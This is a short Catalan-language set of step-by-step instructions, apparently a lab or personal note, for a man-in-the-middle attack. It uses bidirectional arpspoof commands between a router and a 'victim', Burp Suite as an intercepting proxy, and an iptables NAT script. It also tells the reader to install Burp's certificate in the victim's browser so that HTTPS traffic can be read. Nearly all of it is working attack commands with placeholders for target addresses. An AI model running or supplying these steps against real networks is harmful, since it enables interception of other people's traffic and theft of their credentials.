Instruccions per MITM amb multiples eines

Cal obrir 4 finestres amb arpspoofing , burp suite i script iptables:

Terminal 1:

$> sudo arpspoof -i eth0 -t <IP ROUTER> <IP VICTIMA>

Terminal 2:

$> sudo arpspoof -i eth0 -t <IP VICTIMA> <IP ROUTER>

Terminal 3:

$> sudo java -jar <fichero burpsuite.jar>
$> sudo iptables -L -t nat

--> Cal exportar el certificat del burpsuite i posar-ho en el navegador de la victima.

Terminal 4

$> sudo sh ./script_iptables.sh